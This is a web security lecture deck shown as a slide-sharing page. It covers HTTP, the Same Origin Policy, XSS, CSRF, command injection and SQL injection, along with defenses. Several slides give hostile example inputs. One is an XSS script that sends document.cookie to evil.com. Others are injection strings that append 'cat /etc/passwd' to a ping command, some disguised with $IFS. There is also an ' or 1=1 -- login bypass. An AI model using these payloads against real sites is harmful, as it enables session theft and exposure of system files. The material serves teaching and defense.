Abstract image of a woman sitting on books and studying on a laptop

Web Security and its Importance in the Present era

Download as PPTX, PDF
V
VivekanandaGN1

The document outlines various aspects of web security, particularly focusing on the HTTP protocol and common vulnerabilities like XSS, CSRF, and SQL injection. It discusses the architecture of the networking stack and the importance of application security practices, including method types for HTTP requests and response codes. Additionally, the document provides an overview of the Same Origin Policy and defense mechanisms against prevalent web attacks.

Engineering
Related topics:
Web Security Overview
1 of 30
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
CS 181S Spring 2024 Lecture 25: Web Security
Networking Stack 7 - Application 6 - Presentation 5 - Session 4 - Transport 3 - Network 2 - Data Link 1 - Physical HTTP TLS/SSL TCP/UDP IP Ethernet 0s and 1s Deliver content Manage encoding Manage sessions Deliver (un)reliably Deliver globally Deliver locally Deliver signals
Application Layer: HTTP • Hypertext Transfer Protocol (HTTP) is an application protocol for distributed information systems • Stateless request-response protocol • Requests resources identified by Uniform Resource Locators (URLs) Request Response GET Retrieve resource (no side effects) HEAD Retrieve header for GET request (no body) POST Requests that server accept new object (e.g., results of form or new database item) and store it as subordinate of resource identified by URI PUT Requests that server store new object under supplied URI DELETE Delete specified resource
Example Request • HTTP Request: • HTTP Response: Request Method Path Protocol Version Headers Header Body
HTTP Response Codes Code Message 200 OK 201 Created 302 Found 401 Unauthorized 403 Forbidden 404 Not Found 409 Conflict 500 Internal Server Error 502 Bad Gateway
Vulnerabilities by Year 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017 2018 2019 2020 2021 2022 2023 0 500 1000 1500 2000 2500 3000 3500 DDOS Overflow XSS CSRF SQL
Vulnerability Occurrence in Applications Injection (O1) CSRF Broken Access Control (O5) Broken Authentication (O2) XSS (O7) Misconfigurations (O6) 0% 10% 20% 30% 40% 50% 60% 70% 80% 90%
Broken Authentication
HTML <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>CS 181S - Fall 2018</title> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300i,600,700,700i' rel='stylesheet' type='text/css'> <link href='https://fonts.googleapis.com/css?family=Inconsolata:400,700,700i' rel='stylesheet' type='text/css'> <link href="resources/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="resources/css/main.css"> </head> <body> <header class="site-header"> <div class="navbar navbar-inverse navbar-fixed-top"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="/courses/cs5430/2018sp/">CS 181S <span class="hidden-xs hidden-sm">: System Security</span> <span class="hidden-md hidden-lg"> - Fall 2018</span> </a> </div>
Dynamic Web Pages Server-Side • PHP • Ruby • Python • Java • Go Client-Side • Javascript
Same Origin Policy (SOP) Data for http://www.example.com/dir/page.html accessed by: • http://www.example.com/dir/page2.html • http://www.example.com/dir2/page3.html • https://www.example.com/dir/page.html • http://www.example.com:81/dir/page.html • http://www.example.com:80/dir/page.html • http://evil.com/dir/page.html • http://example.com/dir/page.html
SOP Exceptions • Domain relaxation: document.domain • Cross-origin network requests: Access-Control-Allow-Origin • Cross-origin client-side communication: postMessage • Importing scripts
Cross-Site Scripting (XSS) • Form of code injection • evil.com sends victim a script that runs on example.com
Reflected XSS Attack Server Victim Server receive malicious link click on link echo user input 1 2 3 send valuable data 5 4 visit web site
Reflected XSS • Search field on victim.com: • http://victim.com/search.php?term=apple • Server-side implementation of search.php: <html> <title> Search Results </title> <body> Results for <?php echo $_GET[term] ? >: ...</body> </html> • What if victim instead clicks on: http://victim.com/search.php?term= <script> window.open(“http://evil.com?cookie = ” + document.cookie ) </script>
Reflected XSS Attack Server Victim Server user gets bad link user clicks on link victim echoes user input www.victim.com www.evil.com <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script> </html> http://victim.com/search.php? term= <script> ... </script>
Stored XSS Attack Server Server Victim User Victim Inject malicious script request content receive malicious script 1 2 3 steal valuable data 4
Stored XSS attack vectors • loaded images • HTML attributes • user content (comments, blog posts)
Example XSS attacks
XSS Defenses • Parameter Validation • HTTP-Only Cookies • Dynamic Data Tainting • Static Analysis • Script Sandboxing
Cookies • Cookies are small blocks of data stored locally by the web browser • Cookie is sent with every request to that domain • Can be used to keep track of whether a user has authenticated (as which user) • And also other things… • Can be set by third parties
Cross-Site Request Forgery (CSRF) Attack Server Server Victim User Victim establish session send forged request visit server (or iframe) receive malicious page 1 2 3 4 (w/ cookie)
CSRF Defenses • Secret Validation Token: • Referrer Validation: • Custom HTTP Header: • User Interaction (e.g., CAPTCHA) <input type=hidden value=23a3af01b> Referrer: http://www.facebook.com/home.php X-Requested-By: XMLHttpRequest
Command Injection • Key issue: exporting local execution capability via Web interface • Request:http://vulnsite/ping?host=8.8.8.8 • Executes: ping –c 2 8.8.8.8 • Simple command injection • Request: http://vulnsite/ping?host=8.8.8.8;cat /etc/passwd • Executes: ping –c 2 8.8.8.8;cat /etc/passwd • Outputs ping output and the contents of “/etc/passwd” • Getting sneakier… • ping –c 2 8.8.8.8|cat /etc/passwd • ping –c 2 8.8.8.8&cat$IFS$9/etc/passwd • ping –c 2 $(cat /etc/passwd)
SQL Injection • SQL Injection is another example of code injection • Adversary exploits user-controlled input to change meaning of database command
SQL Injection Web Server Web Browser (Client) DB Enter Username & Password SELECT * FROM Users WHERE user='me' AND pwd='1234'
SQL Injection Web Server Web Browser (Client) DB Enter Username & Password SELECT * FROM Users WHERE user='me' AND pwd='1234' What if user = “ ' or 1=1 -- ”
SQLi in the Wild
Defenses Against SQL Injection • Prepared Statements: String custname = request.getParameter("customerName"); // perform input validation to detect attacks String query = "SELECT account_balance FROM user_data WHERE user_name = ? "; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, custname); ResultSet results = pstmt.executeQuery( ); • Input Validation: • Case statements, cast to non-string type • Escape User-supplied inputs: • Not recommended
SQL Injection

More Related Content

PDF
Using Communication and Messaging API in the HTML5 World
Gil Fink
 
PDF
Romulus OWASP
Grupo Gesfor I+D+i
 
PDF
Using communication and messaging API in the HTML5 world - GIl Fink, sparXsys
Codemotion Tel Aviv
 
PDF
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
PDF
Burp suite
Yashar Shahinzadeh
 
PDF
Ch 3: Web Application Technologies
Sam Bowne
 
PDF
Http requesting smuggling
Apijay Kumar
 
PDF
Http requesting smuggling
Apijay Kumar
 
Using Communication and Messaging API in the HTML5 World
Gil Fink
 
Romulus OWASP
Grupo Gesfor I+D+i
 
Using communication and messaging API in the HTML5 world - GIl Fink, sparXsys
Codemotion Tel Aviv
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
Burp suite
Yashar Shahinzadeh
 
Ch 3: Web Application Technologies
Sam Bowne
 
Http requesting smuggling
Apijay Kumar
 
Http requesting smuggling
Apijay Kumar
 

Similar to Web Security and its Importance in the Present era (20)

PDF
CNIT 129S - Ch 3: Web Application Technologies
Sam Bowne
 
PPT
Juglouvain http revisited
marctritschler
 
ZIP
Websockets at tossug
clkao
 
PPTX
Web-01-HTTP.pptx
AliZaib71
 
PDF
CNIT 129S: Ch 3: Web Application Technologies
Sam Bowne
 
PPTX
general protocol basics
Aravindan A
 
PPT
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 
PPT
6 app-tcp
Olivier Bonaventure
 
PPTX
JUDCon 2013- JBoss Data Grid and WebSockets: Delivering Real Time Push at Scale
C2B2 Consulting
 
PPTX
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
PDF
Black hat usa_2015-bypass_surgery-6_aug2015
a4202655
 
PPT
HTML5 hacking
Blueinfy Solutions
 
PDF
The never-ending REST API design debate
Restlet
 
PDF
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Ivo Andreev
 
PPTX
Evolution Of The Web Platform & Browser Security
Sanjeev Verma, PhD
 
PPTX
Vulnerabilities in data processing levels
beched
 
PPT
Browser Security
Roberto Suggi Liverani
 
PDF
Embracing HTTP in the era of API’s
Visug
 
PPT
web-servers3952 (1)qwjelkjqwlkjkqlwe.ppt
20521742
 
PPTX
Basics of the Web Platform
Sanjeev Verma, PhD
 
CNIT 129S - Ch 3: Web Application Technologies
Sam Bowne
 
Juglouvain http revisited
marctritschler
 
Websockets at tossug
clkao
 
Web-01-HTTP.pptx
AliZaib71
 
CNIT 129S: Ch 3: Web Application Technologies
Sam Bowne
 
general protocol basics
Aravindan A
 
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 
6 app-tcp
Olivier Bonaventure
 
JUDCon 2013- JBoss Data Grid and WebSockets: Delivering Real Time Push at Scale
C2B2 Consulting
 
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
Black hat usa_2015-bypass_surgery-6_aug2015
a4202655
 
HTML5 hacking
Blueinfy Solutions
 
The never-ending REST API design debate
Restlet
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Ivo Andreev
 
Evolution Of The Web Platform & Browser Security
Sanjeev Verma, PhD
 
Vulnerabilities in data processing levels
beched
 
Browser Security
Roberto Suggi Liverani
 
Embracing HTTP in the era of API’s
Visug
 
web-servers3952 (1)qwjelkjqwlkjkqlwe.ppt
20521742
 
Basics of the Web Platform
Sanjeev Verma, PhD
 
Ad

More from VivekanandaGN1 (20)

PPTX
Study_Material_Presentations_Unit-2.pptx
VivekanandaGN1
 
PPT
Classical-Problem-of-Synchronization in OS
VivekanandaGN1
 
PPT
Cost, Price, and Price for Performance.ppt
VivekanandaGN1
 
PPT
Computer performance and cost analysis in systems
VivekanandaGN1
 
PPT
Technology trends-Computer food chain technologies
VivekanandaGN1
 
PPT
Fundamentals of Computer Architecture lecture notes
VivekanandaGN1
 
PPT
Digital computer architecture issues in IO
VivekanandaGN1
 
PPT
Storage devices metrics productivity- IO Introduction
VivekanandaGN1
 
PPTX
Web security Threats and approaches in Security.pptx
VivekanandaGN1
 
PPTX
Remote User Authentication ,Symmetric, Asymmetric and Kerberos.ppt
VivekanandaGN1
 
PPTX
Key management and Distribution in Network security.ppt
VivekanandaGN1
 
PPTX
Message Authentication Codes in Security.pptx
VivekanandaGN1
 
PPTX
Cryptographic Hash Functions in Security.pptx
VivekanandaGN1
 
PPTX
Asymmetric Ciphers in Networks and Security.pptx
VivekanandaGN1
 
PPTX
IdentityTheft by federal trade comission
VivekanandaGN1
 
PPTX
Cybercrime Mobile and Wireless Devices.pptx
VivekanandaGN1
 
PPTX
Cyber Secuirty Fully explained Lecture Notes
VivekanandaGN1
 
PPT
CYBER-CRIME PRESENTATION with real-time examples
VivekanandaGN1
 
PDF
GANS Project for Image idetification.pdf
VivekanandaGN1
 
PDF
Cheat sheet SQL commands with examples and easy understanding
VivekanandaGN1
 
Study_Material_Presentations_Unit-2.pptx
VivekanandaGN1
 
Classical-Problem-of-Synchronization in OS
VivekanandaGN1
 
Cost, Price, and Price for Performance.ppt
VivekanandaGN1
 
Computer performance and cost analysis in systems
VivekanandaGN1
 
Technology trends-Computer food chain technologies
VivekanandaGN1
 
Fundamentals of Computer Architecture lecture notes
VivekanandaGN1
 
Digital computer architecture issues in IO
VivekanandaGN1
 
Storage devices metrics productivity- IO Introduction
VivekanandaGN1
 
Web security Threats and approaches in Security.pptx
VivekanandaGN1
 
Remote User Authentication ,Symmetric, Asymmetric and Kerberos.ppt
VivekanandaGN1
 
Key management and Distribution in Network security.ppt
VivekanandaGN1
 
Message Authentication Codes in Security.pptx
VivekanandaGN1
 
Cryptographic Hash Functions in Security.pptx
VivekanandaGN1
 
Asymmetric Ciphers in Networks and Security.pptx
VivekanandaGN1
 
IdentityTheft by federal trade comission
VivekanandaGN1
 
Cybercrime Mobile and Wireless Devices.pptx
VivekanandaGN1
 
Cyber Secuirty Fully explained Lecture Notes
VivekanandaGN1
 
CYBER-CRIME PRESENTATION with real-time examples
VivekanandaGN1
 
GANS Project for Image idetification.pdf
VivekanandaGN1
 
Cheat sheet SQL commands with examples and easy understanding
VivekanandaGN1
 
Ad

Recently uploaded (20)

PDF
Beginners-Guide-to-Artificial-Intelligence.pdf
TamerAMekhimar
 
PPTX
CS6006 - CLOUD COMPUTING - Module - 1.pptx
dharshinidharshu575
 
PPTX
SE unit 1.pptx aaahshdhajdviwhsiehebeiwheiebeiev
dsp1122334467
 
PPTX
ARCHITECTURE AND PROGRAMMING OF EMBEDDED SYSTEMS
Jeevanandhams14
 
PDF
IAE-V2500 Engine Airbus Family A319/320
RosneyAlfaro2
 
PPTX
22ME926Introduction to Business Intelligence and Analytics, Advanced Integrat...
ssuser329719
 
PPTX
SE unit 1.pptx by d.y.p.akurdi aaaaaaaaaaaa
dsp1122334467
 
PDF
MACCAFERRY GUIA GAVIONES TERRAPLENES EN ESPAÑOL
Distribucioneskaled
 
PPTX
INTERNET OF THINGS - EMBEDDED SYSTEMS AND INTERNET OF THINGS
Jeevanandhams14
 
PPT
UNIT-I Machine Learning Essentials for 2nd years
rajeswarigcse
 
PDF
CELDAS DE COMBUSTIBLE TIPO MEMBRANA DE INTERCAMBIO PROTÓNICO.pdf
sanzpatza
 
PPTX
Real Estate Management PART 1.pptxFFFFFFFFFFFFF
AshenafiShibru
 
PDF
Engineering Solutions for Ethical Dilemmas in Healthcare (www.kiu.ac.ug)
publication11
 
PDF
electrical machines course file-anna university
suganyamurali02
 
PDF
Mechanics of materials week 2 rajeshwari
siddarthakattamuru
 
PDF
ECT443_instrumentation_Engg_mod-1.pdf indroduction to instrumentation
brijmohan776944
 
PPTX
Unit IImachinemachinetoolopeartions.pptx
Praveen Kumar
 
PDF
Lesson 3 .pdf
Yatru Harsha Hiski
 
PDF
Artificial Intelligence_ Basics .Artificial Intelligence_ Basics .
veyetas395
 
PDF
ST MNCWANGO P2 WIL (MEPR302) FINAL REPORT.pdf
sthathabo
 
Beginners-Guide-to-Artificial-Intelligence.pdf
TamerAMekhimar
 
CS6006 - CLOUD COMPUTING - Module - 1.pptx
dharshinidharshu575
 
SE unit 1.pptx aaahshdhajdviwhsiehebeiwheiebeiev
dsp1122334467
 
ARCHITECTURE AND PROGRAMMING OF EMBEDDED SYSTEMS
Jeevanandhams14
 
IAE-V2500 Engine Airbus Family A319/320
RosneyAlfaro2
 
22ME926Introduction to Business Intelligence and Analytics, Advanced Integrat...
ssuser329719
 
SE unit 1.pptx by d.y.p.akurdi aaaaaaaaaaaa
dsp1122334467
 
MACCAFERRY GUIA GAVIONES TERRAPLENES EN ESPAÑOL
Distribucioneskaled
 
INTERNET OF THINGS - EMBEDDED SYSTEMS AND INTERNET OF THINGS
Jeevanandhams14
 
UNIT-I Machine Learning Essentials for 2nd years
rajeswarigcse
 
CELDAS DE COMBUSTIBLE TIPO MEMBRANA DE INTERCAMBIO PROTÓNICO.pdf
sanzpatza
 
Real Estate Management PART 1.pptxFFFFFFFFFFFFF
AshenafiShibru
 
Engineering Solutions for Ethical Dilemmas in Healthcare (www.kiu.ac.ug)
publication11
 
electrical machines course file-anna university
suganyamurali02
 
Mechanics of materials week 2 rajeshwari
siddarthakattamuru
 
ECT443_instrumentation_Engg_mod-1.pdf indroduction to instrumentation
brijmohan776944
 
Unit IImachinemachinetoolopeartions.pptx
Praveen Kumar
 
Lesson 3 .pdf
Yatru Harsha Hiski
 
Artificial Intelligence_ Basics .Artificial Intelligence_ Basics .
veyetas395
 
ST MNCWANGO P2 WIL (MEPR302) FINAL REPORT.pdf
sthathabo
 

Web Security and its Importance in the Present era

  • 1. CS 181S Spring 2024 Lecture 25: Web Security
  • 2. Networking Stack 7 - Application 6 - Presentation 5 - Session 4 - Transport 3 - Network 2 - Data Link 1 - Physical HTTP TLS/SSL TCP/UDP IP Ethernet 0s and 1s Deliver content Manage encoding Manage sessions Deliver (un)reliably Deliver globally Deliver locally Deliver signals
  • 3. Application Layer: HTTP • Hypertext Transfer Protocol (HTTP) is an application protocol for distributed information systems • Stateless request-response protocol • Requests resources identified by Uniform Resource Locators (URLs) Request Response GET Retrieve resource (no side effects) HEAD Retrieve header for GET request (no body) POST Requests that server accept new object (e.g., results of form or new database item) and store it as subordinate of resource identified by URI PUT Requests that server store new object under supplied URI DELETE Delete specified resource
  • 4. Example Request • HTTP Request: • HTTP Response: Request Method Path Protocol Version Headers Header Body
  • 5. HTTP Response Codes Code Message 200 OK 201 Created 302 Found 401 Unauthorized 403 Forbidden 404 Not Found 409 Conflict 500 Internal Server Error 502 Bad Gateway
  • 7. Vulnerability Occurrence in Applications Injection (O1) CSRF Broken Access Control (O5) Broken Authentication (O2) XSS (O7) Misconfigurations (O6) 0% 10% 20% 30% 40% 50% 60% 70% 80% 90%
  • 9. HTML <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>CS 181S - Fall 2018</title> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300i,600,700,700i' rel='stylesheet' type='text/css'> <link href='https://fonts.googleapis.com/css?family=Inconsolata:400,700,700i' rel='stylesheet' type='text/css'> <link href="resources/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="resources/css/main.css"> </head> <body> <header class="site-header"> <div class="navbar navbar-inverse navbar-fixed-top"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="/courses/cs5430/2018sp/">CS 181S <span class="hidden-xs hidden-sm">: System Security</span> <span class="hidden-md hidden-lg"> - Fall 2018</span> </a> </div>
  • 10. Dynamic Web Pages Server-Side • PHP • Ruby • Python • Java • Go Client-Side • Javascript
  • 11. Same Origin Policy (SOP) Data for http://www.example.com/dir/page.html accessed by: • http://www.example.com/dir/page2.html • http://www.example.com/dir2/page3.html • https://www.example.com/dir/page.html • http://www.example.com:81/dir/page.html • http://www.example.com:80/dir/page.html • http://evil.com/dir/page.html • http://example.com/dir/page.html
  • 12. SOP Exceptions • Domain relaxation: document.domain • Cross-origin network requests: Access-Control-Allow-Origin • Cross-origin client-side communication: postMessage • Importing scripts
  • 13. Cross-Site Scripting (XSS) • Form of code injection • evil.com sends victim a script that runs on example.com
  • 14. Reflected XSS Attack Server Victim Server receive malicious link click on link echo user input 1 2 3 send valuable data 5 4 visit web site
  • 15. Reflected XSS • Search field on victim.com: • http://victim.com/search.php?term=apple • Server-side implementation of search.php: <html> <title> Search Results </title> <body> Results for <?php echo $_GET[term] ? >: ...</body> </html> • What if victim instead clicks on: http://victim.com/search.php?term= <script> window.open(“http://evil.com?cookie = ” + document.cookie ) </script>
  • 16. Reflected XSS Attack Server Victim Server user gets bad link user clicks on link victim echoes user input www.victim.com www.evil.com <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script> </html> http://victim.com/search.php? term= <script> ... </script>
  • 17. Stored XSS Attack Server Server Victim User Victim Inject malicious script request content receive malicious script 1 2 3 steal valuable data 4
  • 18. Stored XSS attack vectors • loaded images • HTML attributes • user content (comments, blog posts)
  • 20. XSS Defenses • Parameter Validation • HTTP-Only Cookies • Dynamic Data Tainting • Static Analysis • Script Sandboxing
  • 21. Cookies • Cookies are small blocks of data stored locally by the web browser • Cookie is sent with every request to that domain • Can be used to keep track of whether a user has authenticated (as which user) • And also other things… • Can be set by third parties
  • 22. Cross-Site Request Forgery (CSRF) Attack Server Server Victim User Victim establish session send forged request visit server (or iframe) receive malicious page 1 2 3 4 (w/ cookie)
  • 23. CSRF Defenses • Secret Validation Token: • Referrer Validation: • Custom HTTP Header: • User Interaction (e.g., CAPTCHA) <input type=hidden value=23a3af01b> Referrer: http://www.facebook.com/home.php X-Requested-By: XMLHttpRequest
  • 24. Command Injection • Key issue: exporting local execution capability via Web interface • Request:http://vulnsite/ping?host=8.8.8.8 • Executes: ping –c 2 8.8.8.8 • Simple command injection • Request: http://vulnsite/ping?host=8.8.8.8;cat /etc/passwd • Executes: ping –c 2 8.8.8.8;cat /etc/passwd • Outputs ping output and the contents of “/etc/passwd” • Getting sneakier… • ping –c 2 8.8.8.8|cat /etc/passwd • ping –c 2 8.8.8.8&cat$IFS$9/etc/passwd • ping –c 2 $(cat /etc/passwd)
  • 25. SQL Injection • SQL Injection is another example of code injection • Adversary exploits user-controlled input to change meaning of database command
  • 27. SQL Injection Web Server Web Browser (Client) DB Enter Username & Password SELECT * FROM Users WHERE user='me' AND pwd='1234' What if user = “ ' or 1=1 -- ”
  • 28. SQLi in the Wild
  • 29. Defenses Against SQL Injection • Prepared Statements: String custname = request.getParameter("customerName"); // perform input validation to detect attacks String query = "SELECT account_balance FROM user_data WHERE user_name = ? "; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, custname); ResultSet results = pstmt.executeQuery( ); • Input Validation: • Case statements, cast to non-string type • Escape User-supplied inputs: • Not recommended

Editor's Notes

  • #4: Demo: course website w/ web inspector + wireshark
  • #6: https://nvd.nist.gov/vuln/search Basic Statistics keywords: "denial", "overflow", "xss", "csrf", "SQL"
  • #7: https://owasp.org/www-project-top-ten/
  • #9: https://www.ptsecurity.com/ww-en/analytics/web-vulnerabilities-2020/ Hackers can attack users in 9 out of 10 web applications. Attacks include redirecting users to a hacker-controlled resource, stealing credentials in phishing attacks, and infecting computers with malware. Unauthorized access to applications is possible on 39 percent of sites. In 2019, full control of the system could be obtained on 16 percent of web applications. On 8 percent of systems, full control of the web application server allowed attacking the local network.
  • #10: https://www.ptsecurity.com/ww-en/analytics/web-vulnerabilities-2020/
  • #12: Demo: minesweeper in javascript
  • #15: scripts can be imported from remote origins, have privilieges of imported page (not source)
  • #21: Wordpress (2024): https://www.searchenginejournal.com/wordpress-discovers-xss-vulnerability-recommends-updating-to-6-5-2/513501/ https://cybersecuritynews.com/xss-remains-as-the-most-vulnerability/ Joomla (2024): https://www.darkreading.com/application-security/joomla-xss-bugs-open-millions-websites-rce Azure (2023): https://www.darkreading.com/application-security/microsoft-azure-hdinsight-xss-vulnerabilities Zimbra (2023): https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/ Yahoo mail (2016): https://nakedsecurity.sophos.com/2016/01/21/xss-bug-in-yahoo-mail-could-have-let-attackers-take-over-email-accounts/ Stored XSS on ebay (2017): malicious sellers added scripts to legitimate product listings to redirect users to a spoofed login page that harvested credentials before redirecting users back to a legitimate eBay page. https://news.netcraft.com/archives/2017/02/17/hackers-still-exploiting-ebays-stored-xss-vulnerabilities-in-2017.html Expandable ads (2018): https://threatpost.com/once-popular-online-ad-format-opens-top-tier-sites-to-xss-attacks/137681/
  • #23: -standard cookies, third party cookies
  • #26: | is pipe $IFS is environment variable for inter-command separater (by default, space), $9 is ninth arg (always empty string)
  • #30: Wordpress (2024): https://www.darkreading.com/remote-workforce/critical-security-flaw-wordpress-sql-injection Fortinet (2024): https://www.scmagazine.com/news/fortinet-forticlient-ems-sql-injection-flaw-exploited-in-the-wild MoveIt (2023): https://www.theregister.com/2023/06/01/moveit_transfer_zero_day/ https://www.theregister.com/2024/03/26/fbi_cisa_sql_injection/